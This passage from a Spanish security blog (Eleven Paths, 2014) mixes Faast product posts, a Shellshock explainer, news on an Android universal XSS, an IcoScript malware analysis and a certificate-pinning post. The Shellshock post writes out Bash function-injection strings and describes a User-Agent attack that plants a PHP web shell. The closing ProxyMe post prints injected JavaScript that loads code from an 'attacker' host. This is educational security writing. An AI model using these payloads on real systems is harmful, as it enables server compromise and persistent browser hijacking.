Faast incorpora pentesting 24x7, es decir, añade un modo de pentesting persistente que estará en funcionamiento las 24 horas de los siete días de la semana. Esto supone un gran avance frente a las auditorías de seguridad "tradicionales" que se realizan cada cierto tiempo. A la hora de lanzar un análisis, Faast permite además varias funciones. Veamos cuáles. Desde la herramienta Faast podemos lanzar un escaneo con múltiples opciones. Utiliza una interfaz muy clara desde la que es posible seleccionar el dominio a escanear dentro de una lista de los dominios contratados. Creando un nuevo escaneo con Faast Esta primera vista permitirá observar de forma rápida y sencilla los dominios disponibles, o utilizar un filtro para encontrarlos rápidamente. Una vez seleccionado el dominio o los dominios para realizar el escaneo, procederemos a seleccionar el modo de escaneo. Primero, tendremos que seleccionar el número de "workers" que se utilizaran en el escaneo. Los "workers" son procesos que ejecutan las tareas propias de Faast. A mayor cantidad de "workers" más procesos se estarán ejecutando a la vez, por lo que el escaneo será más rápido. Dependiendo del número de activos en los sistemas del cliente, Faast proporciona diferentes configuraciones atendiendo las necesidades temporales-económicas de cada empresa. Estas configuraciones se basarán en el número de "workers" a emplear. Es posible seleccionar de 1 a 100 workers por cada escaneo. Seleccionando el número de workers A continuación, se debe seleccionar la frecuencia con la que se realizará el escaneo. Podemos elegir entre escaneo continuo y escaneo no continuo. Faast aporta por primera vez la novedad del escaneo continuo o "pentesting 24x7". Para lanzar un escaneo no continuo debemos seleccionar la frecuencia o el intervalo de tiempo en el que queramos lanzar nuestro escaneo, conocido como "ventana de tiempo". En caso de que el escaneo no haya podido finalizar en el tiempo definido anteriormente, continuará en el mismo punto donde lo dejó en el mismo intervalo de tiempo. En esta pantalla se indica qué tipo de test realizar En el modo continuo lanzará el escaneo nada más definirlo y una vez acabe, empezará de nuevo con los mismos parámetros anteriormente definidos. Para realizar el escaneo, deberemos especificar los test que queramos verificar y se encargarán de buscar vulnerabilidades en los dominios que hayamos especificado. Se dividen en tres partes: Descubrimiento: Estos test se encargarán de descubrir toda la información pública del dominio. Análisis: Estos test se encargan de analizar toda la información pública obtenida en cada test de la fase anterior, en busca de vulnerabilidades que pueda sufrir el sistema del dominio auditado. Explotación: esta última fase lanza las pruebas de explotación sobre las vulnerabilidades conocidas de los activos y elementos pertenecientes al dominio auditado. Simula la acción de un intruso sobre un activo al que se le ha detectado una vulnerabilidad. Descripción del análisis En cada fase podemos escoger los test que queramos lanzar dependiendo de nuestras prioridades o bien, lanzar todos. La penúltima fase antes de lanzar nuestro escaneo consiste en un apartado opcional en el que podremos asignarle una descripción. Por último, se dispone de un apartado en el que indicar el usuario y contraseña en el caso de que nuestro escaneo tenga una parte protegida que queramos auditar. También podremos definir el inicio de sesión a través de una cookie. El último paso antes de lanzar nuestro escaneo nos mostrará(a modo de resumen) las características de nuestro escaneo. Visto esto bastará con pulsar el botón Hecho. Confirmación del escaneo y sus datos en Faast Jaime Ramos jaime.ramos@11paths.com
2 de octubre de 2014
Shellshock, cómo se podría explotar en remoto
Han pasado solo unas horas desde que se ha hecho público el fallo, y aunque ya ha dado tiempo a implementarlo en Faast como plugin, empieza a ser tarde para intentar aportar algo nuevo de Shellshock (CVE-2014-6271). Centrémonos en explicar cómo puede ser explotado el fallo en remoto, a través de un CGI, estudiando paso a paso qué ocurre. Shellshock Como toda gran vulnerabilidad desde HeartBleed, esta necesita un nombre. Parece que Shellshock es el consenso. Fundamentalmente el fallo es que Bash sigue ejecutando el código que se añade después de definir una función en una variable de entorno. Básicamente, en Bash podemos definir, por un lado, una función "anónima": ’(){ echo "hola"; };’ O incluso una función vacía y además anónima. ’(){ :; };’ Por otro, podemos definir variables de entorno en Bash, con env o cualquier otro método. E incluso, variables de entorno que son funciones. Por ejemplo. env VARDENTORNO=’(){ :; };’ El fallo es que bash, al interpretar esto, no se detiene en el último punto y coma, sino que sigue. Por ejemplo: env VARDENTORNO=’(){ :; }; echo "Se ha ejecutado el echo... y lo que queramos"’ lo ejecutaría cuando sea exportado o definida la función. Ya tenemos lo básico. En esta captura se resume el funcionamiento. Jugando un poco con las variables de entorno, las exportaciones y la vulnerabilidad ¿En remoto? Imaginemos un CGI en Bash colgado en una página. Si se le envía al script una cabecera con una función definida y un comando a continuación... ejecutará ese comando a continuación. Este ejercicio está inspirado en esta prueba de concepto. Para empezar, definimos un script cualquiera que haga de CGI. Sencillo CGI Ahora veamos paso a paso. Queremos pasarle una función cualquiera a una variable de entorno y a continuación un comando. Para eso, podemos aprovechar que Apache toma las cabeceras como (o las transforma en) variables de entorno. Por ejemplo, el User-Agent se introducirá como valor de la variable de entorno HTTP_USER_AGENT de Apache. Si se le envía una función definida y cuando termine un comando... interpretará el comando y ya tenemos la ejecución de código. ¿Cómo cambiar el User Agent? Muchas formas. ¿Qué comandos usarán si quieren hacer daño? Lo más sencillo (y de lo que habrá gusanos en cuestión de horas) sería descargar una shell php. Veamos cómo, por ejemplo con Curl. Curl definiendo un user agent y atacando al servidor en 192.168.57.137 Con el comando -H se le define la cabecera User-Agent (o cualquier otra). Se usa una función vacía (es irrelevante su contenido para este fin) y luego el comando interesante (wget). En este caso, se baja una shell pública en c99txt.net y se almacena en /var/www/upload/d.php en el servidor. Estos son los logs de Apache una vez lanzado.... Logs de Apache durante el ataque Devuelve un 500 porque la función no termina limpiamente, pero el comando se ha ejecutado. ¿La prueba? Obviamente, el atacante "solo" dispone de los permisos y privilegios de Apache, y esto limita dónde escribir y qué hacer. También es importante recordar que los comandos deben ir con sus rutas absolutas. El ataque es posible con cualquier sistema que permita cambiar el user-agent, por ejemplo el plugin para Firefox Cambiando el User-Agent con un plugin de Firefox En resumen, algo muy apetecible para crear gusanos que busquen indiscriminadamente CGIs y una vez con permisos de ejecución, busquen nuevas víctimas ellos mismos. El problema es que no solo con Apache, sino con decenas de sistemas o programas que usen Bash en algún momento del proceso, se puede ser vulnerable. Durante los siguientes días, se seguirán encontrando fórmulas ingeniosas para explotar el fallo. Sergio de los Santos ssantos@11paths.com @ssantosv
25 de septiembre de 2014
El XSS universal: Un desastre contra la privacidad de Android
"No podía creerlo, pero después de varias pruebas, parece que es verdad: en el navegador de Android es posible cargar JavaScript arbitrario en cualquier página". Con esta introducción de Joe Vennix, del equipo de Metasploit, se presenta el último "desastre de privacidad" en Android (ha habido varios, al menos clasificados como desastres, y Joe ha desarrollado exploit para algunos...). Pero este es un poco especial, por su sencillez y alcance. Rafay Baloch lo descubrió a principios de septiembre. Un fallo en el navegador por defecto de Android que permite eludir la política de SOP (Same Origin Policy) en las páginas. A efectos prácticos, significa que si se visita una web de un atacante con el navegador por defecto, el atacante podría tener acceso a toda la información de cualquier página. No solo la información explícita sino obviamente a las cookies (si no están protegidas) y por tanto, pueden robar las sesiones de las webs. ¿SOP? La política del mismo origen en los navegadores es el fundamento de su seguridad. Básicamente (excepto objetos con "src", y el "location") significa que el JavaScript de una página no puede mezclarse con otra. Está restringido a la web que lo lanza y no puede salir de ahí. Si lo hiciera, tendría acceso prácticamente al control total de cualquier otra web. El "truco" en este caso, estaba en introducir un carácter nulo al principio de la declaración del javaScript. Por ejemplo así: Ocurre que muchas páginas impiden en su propio código que sean llamadas por un iframe, y abortan su ejecución si se saben que son llamadas así. Sin embargo, se solucionó rápido. Usando "sandbox" u opciones x-frame es posible eludir esto. Es más, ya lo han sacado en un módulo de mestasploit que hace el XSS completamente universal. ¿Es tan grave? Otros problemas previos (que también fueron muy graves), también fueron sencillos de explotar, pero este es grave por lo sencillo de entender y explotar. Afecta a cualquier versión menos la 4.4, lo que viene siendo un 75% de los Android actualmente en activo. También es grave que exista ya un sencillo módulo de metasploit, y que sea tan fácil de configurar. El atacante solo debe "obligar" a la víctima a visitar una web. Y debe hacerlo con el navegador por defecto... que es el que la mayoría usará. De hecho, parece que se usa tanto como Chrome para móviles. Fuente: www.netmarketshare.com En cualquier caso, si la web utiliza la protección "HTTPonly" para la cookie, en principio no podría ser robada por JavaScript, pero sí se podría acceder al contenido de una web (aunque estuviera cerrada la pestaña, basta con que la sesión se encontrase activa). Esto implicaría, que si se tiene la sesión abierta, y se visita una web del atacante, este podría leer correos si se consultó el webmail hace poco, datos bancarios si la sesión del banco aún está abierta, etc. Obviamente, el usuario debe utilizar otro navegador para protegerse ahora mismo, o esperar un parche... cosa que, como de costumbre en los móviles, es complicado que ocurra a corto plazo. Los comandos en metasploit para que un atacante prepare una página para robar el contenido de una web, serían tan sencillos como estos: Otros desastres en Android Este es el enésimo fallo en Android que "afecta a la inmensa mayoría de dispositivos Android". En realidad, siempre que se encuentre un fallo en cualquier plataforma, afectará a una inmensa mayoría de esos dispositivos... pero es cierto que con Android se es más propenso a utilizar estos titulares, con porcentajes o números incluidos. Recordemos brevemente algunos de ellos: En marzo, con HeartBleed, se anunció que 50 millones de sistemas Android también se veían afectados. En junio, se anunciaba que un desbordamiento de pila (que permitía la ejecución de código) en el KeyStore de Android afectaba al 86% de los dispositivos Android. En julio, los Android desde 2010 estaban en riesgo, porque el Fake ID permitía suplantar el certificado de cualquier app. Esto era el 82% de los dispositivos. La vulnerabilidad "Master key" en el verano de 2013, también afectaba al 99% de los Android, y permitía modificar el apk sin romper la firma criptográfica. Aun así, parece que todavía no se ha detectado que estos fallos hayan sido explotados de forma masiva por atacantes. Sergio de los Santos ssantos@11paths.com @ssantosv
18 de septiembre de 2014
Faast: La importancia de un buen mapa de activos
Uno de los puntos destacados del servicio de pentesting persistente Faast es su potente fase de descubrimiento. Y es que, además de ser un completo escáner de vulnerabilidades capaz de detectar una gran variedad de problemas de seguridad, Faast permite "mapear" detalladamente todos los activos que una organización expone (conscientemente o no) en Internet. Cuando se trata de organizaciones grandes, este número de activos suele ser muy elevado, con lo que el volumen de información que se debe manejar es enorme. ¿Cuál es la mejor manera de representar esa información? Presentada por sí sola, sin estructura o clasificación, aporta poco al servicio de pentesting, mientras que una presentación ordenada y precisa, potencia la eficacia del estudio y del análisis. En Faast se ha optado por tomar como punto de partida una de las características más apreciadas por los usuarios de la herramienta de análisis FOCA: su mapa de activos. Mapa de activos de la FOCA En él, se representa de forma jerárquica el "sitemap" del dominio analizado, con todos sus subdominios. Desplegando un dominio específico, es posible acceder a información extra, como los directorios y ficheros que contiene. Otra vista del mapa de activos en FOCA Con las virtudes de la FOCA en mente, se decidió darle una vuelta de tuerca a su mapa de activos para así mostrar al usuario, de forma sencilla e intuitiva, toda la información obtenida en la fase de descubrimiento, sin importar la cantidad de datos que se manejasen. En la figura de debajo se puede observar la vista del mapa de activos en Faast. En la parte izquierda muestra el árbol de dominios. Es una estructura jerárquica que, tomando como raíz el dominio base escaneado, muestra todos los subdominios encontrados. Mapa de activos en Faast Además, para cada subdominio, se muestra la lista completa de URLs encontradas, identificando si se trata de directorios o archivos, y mostrando los parámetros por separado. Mapa de activos desplegado en Faast Desplegando un dominio del árbol, se muestra en la parte derecha de la vista una tarjeta que resume de forma escueta todo los activos que se han encontrado en él. En la parte superior, en primer lugar, se identifica el sistema operativo, así como las direcciones IP asociadas al dominio. Resumen del mapa de activos La tabla central muestra los distintos servicios de red que se encuentran activos en el dominio, además del puerto en el que se encuentran. Por último, la tabla inferior recoge información adicional encontrada en el dominio, como rutas internas, direcciones de correo electrónico o nombres de usuarios. Cristóbal Bordiú cristobal.bordiu@11paths.com
16 de septiembre de 2014
IcoScript, el malware con un sistema de comunicación más que curioso
IcoScript es un RAT (sistema de administración remota) descubierto en agosto por G-Data más o menos normal... excepto por su forma de contactar con su servidor y recibir órdenes. La novedad consiste en que, en vez de comunicarse con su C&C directamente, lo hace con mails creados y recibidos a través del correo web de Yahoo!, lo que implica pasar bastante desapercibido entre el tráfico "habitual". Veamos más detalles. Desde hace años, el malware no funciona de forma "standalone". No tiene sentido. Por varias razones. Comunicarse con el exterior le permite: Recibir órdenes (en el caso de los RATs). Propagarse (lo creamos o no, esto está en desuso). Obtener una configuración dinámica que le permita funcionar incluso cuando las condiciones cambian. Y lo más importante: deben dejar en algún punto el "botín" y enviar a los atacantes los datos (cualesquiera que sea su naturaleza) robados. Para conseguirlo, el proceso habitual fue, en principio y durante años, que el atacante se conectara a la máquina. Desde 2004, era el sistema infectado el que se conectaba a través de diferentes puertos al sistema. Poco más tarde, se estandarizó el tráfico HTTP para pasar desapercibido y sortear cortafuegos. De nuevo, no mucho más tarde, el cifrado (con estándares o no) de ese tráfico HTTP. En seguida, vino el uso de dominios cambiantes, dinámicos, FastFlux.... todo para sostener la infraestructura en el tiempo y que no se dependiese de un único punto de fallo para el malware. En los últimos tiempos, se ha popularizado la comunicación P2P entre malware y el uso de la red TOR. Estos métodos hacen que sea muy difícil que caiga la infraestructura, pero no oculta especialmente la actividad del malware, que puede ser detectada de forma relativamente "sencilla" analizando tráfico sospechoso o direcciones de destino poco habituales. Método "tradicional" de comunicación con un C&C IcoScript lo que hace es trabajar de forma original en dos puntos muy concretos: intentar que el tráfico pase desapercibido y conseguir que la infraestructura sea "imposible" de tirar, pues usa el correo web de Yahoo!. Cómo exactamente Lo que hace el malware es aprovechar Internet Explorer para visitar Yahoo! Mail e interpretar los correos que le envía el atacante, y a su vez enviarle a él la comunicación. El esquema sería el siguiente: Esquema del método de comunicación de IcoScript Para conseguirlo, internamente en el sistema infectado, se comunica con Internet Explorer a través de una instancia COM con el navegador. Esto permite que, de cara al sistema, sea el propio Internet Explorer el que realiza la conexión con Yahoo! Mail, recoja la información, cree los correos... El troyano solo tiene que construir las URLs, buscar los TEXTAREA, rellenarlos, enviar... Todo de forma "invisible" en el sistema. Con esto consigue algo muy interesante, y es que, de cara a los IDS, forenses, etc, la actividad realizada sea de lo más "normal". Apenas se detectará que a través del navegador se ha visitado Yahoo! Mail y enviado correos a un atacante... y solo si se revisan los logs... Esto le ha permitido pasar desapercibido al menos desde 2012. Con este método, resulta imposible bloquear un dominio "desconocido" (a través de lista blanca o negra) con el que se comunique el malware. Otros detalles El malware utiliza un archivo .ico (con el icono de Adobe Reader) que en realidad contiene, ofuscado, código scripting inventado por los atacantes. El lenguaje hace que las variables se compongan de acciones, pasos... Así consigue, poco a poco, ir a la página de http://mail.yahoo.com, y a través de comunicación COM con el navegador, rellenar el usuario, contraseña, entrar, comprobar el correo... y recibir órdenes. Lo hizo con Yahoo!, pero nada impide intentarlo con otros servicios de correo web. Utiliza los caracteres "<<<<<<<<"COMANDO">>>>>>>>" en los correos para que el malware sepa qué hacer exactamente. Dado que el flujo de comunicación con Yahoo! se hace por gzip, y solo se descomprime en el navegador, en la red no se vería nada de eso si se intenta detectar, puesto que se comprime fácilmente. De cara al usuario, solo sería necesario "una instancia" de Internet Explorer en el sistema, que estaría llevando a cabo toda la comunicación. El troyano que lo ha abierto, podría estar oculto en otro proceso cualquiera, más oculto aún como rootkit... De cara al IDS o los detectores en la red, se estaría enviando un simple correo por Yahoo! Ingenioso, realmente. Sergio de los Santos ssantos@11paths.com @ssantosv
12 de septiembre de 2014
¿Firefox implementa un sistema de certificate pinning?... no del todo
Ya hemos hablado de certificate pinning en el blog (e incluso "en directo" en la RECSI en estos días). Chrome era el único navegador que, además de ser el primero, implementaba el "pinning" de serie. Internet Explorer se apoya por ahora precariamente en EMET y Firefox en un addon llamado Certificate Patrol. Pero desde su versión 32, según los titulares, comenzará a "pinear"... pero esto es solo el comienzo y aunque ha sido anunciado a bombo y platillo, no es del todo cierto... ¿En qué quedamos según estos titulares y la prueba técnica?... ¿Firefox 32 suporta Public Key Pinning o no? Brevemente, el "pineo" de certificados propone que el navegador "recuerde" cuáles son los certificados válidos de una web, para que, en el caso de robo o creación ilegítima (y posterior MiTM), el usuario sea alertado de que no se está conectando al sitio correcto aunque la negociación SSL sea válida. Varios incidentes muy famosos han contribuido a que esta opción sea cada vez más utilizada. Firefox, en su versión 32, ha implementado varias mejoras. Para empezar, ha eliminado de su lista de certificados confiables varios creados solo con claves de 1024 bits. La lista de Firefox es totalmente diferente a la de Windows (y Chrome), y bastante más estricta a la hora de elegir "certificados de confianza", con lo que, con este paso, se vuelve todavía más paranoica. Con respecto al "pinning", lo que ha hecho es complementar lo que ya tenían (HSTS) con el PKP (Public Key Pinning). Pero, cuidado, hay dos "tipos" de PKP y Firefox solo ha implementado una parte... de ahí la confusión. Veamos qué es cada cosa. HSTS El estándar HTTP Strict Transport Security o HSTS. Se trata de una especificación que permite obligar a que, en una página, se use siempre HTTPS aunque el usuario no lo escriba en la barra del navegador. Para ello, el servidor que lo desee debe enviarle una cabecera al navegador, del tipo: Strict-Transport-Security: max-age=16070400; includeSubDomains La primera vez que visita la web, recuerda que a partir de entonces y durante el tiempo especificado en max-age, debe hacerlo por HTTPS. Poco más que añadir sobre esta tecnología. Public key pinning dinámico Esto también son unas cabeceras que permiten a un servidor indicarle al navegador cuáles son sus certificados "habituales" y por cuánto tiempo debe recordarlos. Si alguna vez se produce un ataque de hombre en el medio y suplantación de certificados, el navegador se quejará de que no eran los mismos que recuerda que le indicó el servidor. Así, los dueños de los sitios pueden declarar qué certificados son realmente suyos. Ejemplo de cabeceras de HSTS y Public Key Pinning sobre HTTP devuelto por una página ¿Y cómo funciona exactamente? Imaginemos que el servidor A mantiene una cadena de certificados "normal", con su CA1, CAInt, y CRaíz. El administrador es cuidadoso, y decide hacer uso de PKP. Le indica a su servidor o su página que devuelva las cabeceras correspondientes declarando sus certificados. Para ello tiene que calcular la codificación base64 del sha256 del atributo SubjectPublicKeyInfo del certificado codificado con DER ( parece difícil pero no lo es). Usar el SubjectPublicKeyInfo (SPKI) permite que el certificado cambie aunque se mantenga la clave pública dentro, y por tanto es más flexible. Así que le dice a su servidor web o programa que añada estas cabeceras en sus repuestas HTTP: Public-Key-Pins: max-age=31536000; pin-sha256=base64(sha256(SPKI(CA1)); pin-sha256= base64(sha256(SPKI(CAInt); Donde, en realidad, está "pineando" dos de los tres certificados de su cadena de certificación, y avisando al mundo de que, si alguno cambia en otra visita, es necesario sospechar... excepto el "hoja". En algún momento, un usuario los visita, y el navegador ( si implementa el PKP dinámico) los recuerda. Pero imaginemos que en algún momento posterior el usuario es atacado, y visita sin querer A', que resulta pertenecer a un atacante y que usa otros tres certificados diferentes (CA1', CAint', y CRaíz') en su cadena de certificación. El navegador de la víctima, antes de establecer comunicación ni mostrar nada de ese servidor, se conecta y se trae los certificados de A'. Calcula los hashes de la cadena, y se mueve por esta regla: "Si los pines (hashes que representan a los certificados) de la cadena de certificados del sitio que visito, hace intersección con los hashes que recuerdo que me envió hace tiempo, todo está correcto. Si no, mostraré una alerta". Fallo de pinning en Firefox. Fuente: http://monica-at-mozilla.blogspot.com.es/2014/08/firefox-32-supports-public-key-pinning.html O sea, algún elemento de estos dos conjuntos: base64(sha256(SPKI(CA1)), base64(sha256(SPKI(CAInt)) base64(sha256(SPKI(CA1')), base64(sha256(SPKI(CAInt')) , base64(sha256(SPKI(CRaíz')) Debe ser común para que no haya problemas. En resumen, todo va bien si el conjunto de certificados de A (legítimo) intersecta con el de A' (atacante). A partir de aquí, cabe reconocer que hay escenarios poco probables pero posibles para eludir la seguridad de esta solución, y que el dueño del servidor debe tener cuidado para no generar demasiados falsos positivos. PKP, por ejemplo, no protege del compromiso de claves privadas de certificados intermedios, por ejemplo, puesto que la intersección se daría en muchos casos. Si el administrador del sitio es muy paranoico y "pinea" solo el certificado hoja, el ataque es mucho menos probable, pero se eleva la cantidad de potenciales falsos positivos. Así que habitualmente, lo que hacen es (además está muy recomendado por el RFC) meter un certificado de respaldo para no "bloquearse" por si envían una cabecera que obliga a recordar a los navegadores un certificado durante demasiado tiempo pero poco después expira o se invalida por lo que sea. PKP "incrustado" Pues simplemente, es lo mismo que ya se ha explicado pero en este caso los pines (la codificación en base64 del sha256 del SPKI del certificado) no los envía dinámicamente el servidor, sino que son incrustados en el código del navegador. Así los "recuerda", y el tiempo durante el que los recuerda viene determinado por actualizaciones del programa. Esto no es ningún problema en sí, solo que a largo plazo es insostenible y proporciona muy poca flexibilidad y potencia. Y esto es lo que ha hecho, en su versión 32, Firefox. Conclusiones En rigor, es cierto que Firefox sí ha implementado Public Key Pinning, pero no Public Key Pinning sobre HTTP. Eso es algo que se menciona en la nota de prensa como posibilidad, pero no queda totalmente claro que será algo que se hará a futuro. Y si nos fijamos no solo en que en la versión 32 ha hecho un PKP "no dinámico" sino que además ha "pineado" solo una pequeña parte de dominios importantes... la cosa queda en un comienzo prometedor, pero nada definitivo para Firefox como los titulares parecen comunicar. Y es que en esta versión 32, solo se "pinean" (incrustados) los dominios de Twitter y algunos de la propia Mozilla. En el futuro (quizás en su versión 33) meterán en el código los certificados de Google, Dropbox y en definitiva, todos los que ya implementa Chronium en su código a partir de la versión 34, que no son pocos. En resumen, los titulares inducen a error si no se especifica que el PKP será "built in" (incrustado) y que por ahora se incrustan muy pocos dominios. El objetivo final, más adelante (en un futuro no determinado) es implementar PKP dinámico, y es el camino que ahora comienza Firefox... la noticia no es, precisamente, que lo haya concluido. Sergio de los Santos ssantos@11paths.com @ssantosv
5 de septiembre de 2014
QA: Pruebas para asegurar la calidad del producto software (I)
Las aplicaciones (en general cualquier mecanismo diseñado e implementado por un humano) son propensas a tener fallos. A veces, pueden contribuir al fracaso de cualquier proyecto de software, e impactar de forma negativa en toda una empresa. No parece "justo" que la imagen de toda una compañía se degrade por errores que pueden ser subsanados, y a los que el código es tan "propenso" en general. Los tiempos de desarrollo, los entornos de programación, las diferencias entre versiones... todo influye para que, incluso con la máxima dedicación, puedan darse fallos que empañen la imagen y a veces la reputación, de una organización. Surge por tanto la necesidad de asegurar en lo posible, la calidad del producto. Pruebas de software Principalmente se debe verificar que se cumplan con las especificaciones planteadas desde un inicio por el analista o el propio cliente, y/o eliminar los posibles errores que se hayan cometido en cualquier etapa del desarrollo. Hace años (y todavía en entornos pequeños), estas pruebas se realizaban de manera relativamente informal, como podría ser la generación de informes que pasaban entre departamentos. Pero hoy es, en muchos aspectos, una de las etapas críticas dentro del ciclo de vida del software. Existen, de hecho, diferentes metodologías para llevar a cabo las pruebas de calidad de manera óptima, y que tienen en cuenta la complejidad de trabajar con diferentes lenguajes de programación, sistemas operativos, arquitecturas hardware, etc. Debido a esto último, el proceso de testing debe basarse en metodologías o métricas generales que revisen los aspectos fundamentales del sistema, desde el seguimiento de errores, automatización de pruebas unitarias, etc. Las pruebas de software son las investigaciones empíricas y técnicas cuyo fin es proporcionar información objetiva e independiente sobre la calidad del producto. Esta actividad forma parte del proceso de control de calidad global. Las pruebas son básicamente un conjunto de actividades dentro del desarrollo de software y dependiendo del tipo de pruebas, estas actividades podrán ser implementadas en cualquier momento del proceso de desarrollo. Para conseguirlo, en realidad no existen las "mejores prácticas" como tal, debido a que cada práctica puede ser ideal para una situación pero completamente inútil o incluso perjudicial en otra, por lo que las actividades de testeo, técnicas, documentación, enfoques y demás elementos que condicionarán las pruebas a realizar deben ser seleccionados y utilizados de la manera más eficiente según contexto del proyecto. ¿Por qué es necesario hacer pruebas? La labor de desarrollar software en una empresa (ya sea como producto o herramienta interna) trae consigo la necesidad de asegurar que el trabajo realizado se acerca (en lo posible) a la perfección en cuanto calidad y desarrollo seguro. Evidentemente, esto redunda en la satisfacción del equipo que logra los objetivos como por parte del cliente que obtiene el mayor beneficio de un producto finalizado. Además, como toda buena inversión, ahorra tiempo a largo plazo. Si trasladamos por ejemplo los conceptos al entorno móvil, para asegurar el correcto funcionamiento de las aplicaciones en cada tipo de terminal y sistema operativo, el equipo de pruebas debe realizar diversos test a diferentes niveles (como veremos en siguientes entregas). Excepto Google Play, las grandes compañías de distribución de apps (AppsStore y Microsoft Marketplace) suelen someter a diversas pruebas las apps candidatas, para comprobar que se encuentran dentro de unos umbrales mínimos de calidad. Este proceso puede ser de varios días antes de recibir el visto bueno o el rechazo, con lo que el proceso debería volver a comenzarse. Esta es una de las razones por las que someter cualquier aplicación a una buena batería de pruebas de forma interna. ¿Cuándo y cómo empezar el proceso de testing? Siguiendo el proceso de desarrollo software, tras la realización del análisis, diseño y en algún punto del desarrollo de la aplicación debe iniciarse la etapa de pruebas. Para esto es necesario un ambiente aislado del de desarrollo y el de producción, es decir, debería simularse la ejecución de la aplicación en un entorno idéntico a donde se va a ejecutar. Esto incluye la mayor muestra posible de sistemas "estándar" de usuario, en el caso de que se trate de una aplicación destinada al público en general, donde es imposible simular todos los escenarios. Un aspecto importante para todas las empresas debe ser el tener un buen equipo de testers que cuenten con las herramientas necesarias para realizar las labores de pruebas de una manera eficiente, o bien un conjunto reducido de testers experimentados que lleven la búsqueda de fallos con la metodología con la que están habituados trabajar y en el menor tiempo posible. Otra práctica habitual (más informal pero bastante difundida) es distribuir una versión beta y que los propios usuarios sean los que encuentren los fallos y los reporten. Aunque esto conlleva desventajas, como la complejidad para que los usuarios reporten de manera adecuada el fallo (descripción del entorno, pruebas de concepto...) o simplemente a la pérdida de profesionalidad de todo el proceso en sí. Además, los betatesters, pueden pasar por alto test importantes como "pruebas de estrés", "test unitarios"..., que detectan fallos a nivel modular. Una recomendación importante es que los desarrolladores de una aplicación no pueden ser a su vez testers de esa aplicación. Ser juez y parte hace que se pierda objetividad debido a la presunción de que su desarrollo es totalmente fiable, a la consideración de que determinados elementos no son relevantes a verificar, etc. Por ello es necesario que el equipo de testeo se encuentre totalmente desligado del equipo de programación. En este sentido, surge también una alternativa bastante interesante que es la realización de testeo cruzado entre equipos de trabajo, es decir, un equipo de desarrollo se encarga de realizar las pruebas sobre el software creado por otro equipo y viceversa. Aunque según disponibilidad de personal, siempre será mejor un equipo especializado en realizar estas labores. En las siguientes entregas se irán comentando más y mejor las pruebas a realizar y su importancia. * QA: Pruebas para asegurar la calidad del producto software (II) Jhonattan Fiestas jhonattan.fiestas@11paths.com
3 de septiembre de 2014
Eleven Paths en la XIII Reunión Española sobre Criptografía y Seguridad de la información (RECSI)
Esta semana, los aficionados a la criptografía y seguridad informática en general tienen una cita en la XIII Reunión Española sobre Criptografía y Seguridad de la información (RECSI) que se celebrará en Alicante del 3 al 5 de septiembre. La conferencia RECSI, de celebración bienal, es una de las conferencias más antiguas y de prestigio en España. Una conferencia que reúne a expertos de mundos dispares: en esta edición se profundizará en multitud de temas que irán desde la seguridad en dispositivos móviles hasta el criptoanálisis, pasando por protocolos criptográficos, seguridad en redes, nuevas amenazas y mecanismos de defensa, privacidad, etc. Entre todas las ponencias destacadas de estas jornadas es reseñable la ponencia invitada del Dr. Moti Yung (Google) reconocido con el premio Distinguished Lecturer in Cryptography de la International Association for Cryptologic Research (IACR). Experto en criptografía y conocido, además de por sus investigaciones, por acuñar los términos de criptovirología ya en 1996 o cleptografía. En esta edición, Eleven Paths presenta dos trabajos fruto del departamento de investigación liderado por el Dr. Antonio Guzmán. Contramedidas en la suplantación de autoridades de certificación. Certificate pinning. Autores: Dr. Alfonso Muñoz, Dr. Antonio Guzmán y Sergio de Los Santos. Será el jueves 4 de septiembre de 16:30 a 17:30, con el Dr. Alfonso Muñoz como ponente. En esta ponencia se hablará sobre los ataques actuales a las tecnologías basadas en infraestructuras de clave pública y de autoridades de certificación. Se profundiza en el análisis de nuevas arquitecturas de protección, y se analizan las características más relevantes en las implementaciones de certificate pinning extendidas en Internet. Gestión de identidades digitales basada en el paradigma de la reducción de tiempo de exposición. Autores: Dr. Jose María Alonso, Dr. Antonio Guzmán y Dr. Alfonso Muñoz. Será el viernes 5 de septiembre de 11:30 a 12:50 con el Dr. Alfonso Muñoz como ponente. Esta ponencia muestra de manera formal los principios conceptuales, estadísticos y técnicos de la tecnología Latch, profundizando en resultados específicos de su implantación en el mundo real. La conferencia RECSI es el lugar adecuado para, desde el punto de vista criptográfico, conocer cómo proteger sistemas y sobre todo para comprobar sus potenciales problemas y vulnerabilidades. De hecho, ya lo adelantaba Manuel Machado hace mucho tiempo: "Fatigas, pero no tantas que a fuerza de muchos golpes hasta el hierro se quebranta". Dr. Alfonso Muñoz alfonso.munoz@11paths.com
1 de septiembre de 2014
Nueva herramienta ProxyMe y ataques de cache poisoning (y II)
ProxyMe es una aplicación proxy desarrollada por nuestro compañero Manuel Fernández de Eleven Paths. Fue presentada durante el evento Arsenal del congreso de seguridad Black Hat, que se celebró entre los días 2 y 7 de agosto del 2014 en Las Vegas. Ya está disponible para su descarga con el código fuente desde https://code.google.com/p/proxyme/. El plugin "CachePoison.dll" utiliza un ataque conocido como "Cache poisoning". Fundamentalmente, consiste en forzar a un usuario a que su navegador cachee determinado contenido, al que normalmente se le suele añadir código malicioso para que sea ejecutado por el cliente. Para conseguir que el contenido sea cacheado (y se consiga una permanencia del código malicioso en el equipo cliente) es necesario realizar previamente un ataque de "man-in-the-middle". De esta tarea se encarga ProxyMe. El plugin "CachePoison.dll" se encarga a su vez de modificar la respuesta añadiendo la siguiente cabecera HTTP: Expires: Thu, 25 Dec 2100 11:00:00 GMT De este modo, cuando el cliente recibe la respuesta (modificada por el plugin), la almacena en caché teóricamente hasta el 25 de diciembre del 2100, lo que a efectos prácticos es de forma permanente. El plugin también añade las siguientes líneas de código a todos los ficheros javascript por donde el usuario navegue durante el tiempo que utilice el servidor proxy. Esto le permitirá disfrutar del control sobre ese equipo a un hipotético atacante : function payload()
{
x=document.getElementById("poison");
if (x == null)
{
var script= document.createElement('script');
script.src='http://attacker/js.js';
document.getElementsByTagName('html')[0].appendChild(script);
}
}
payload();
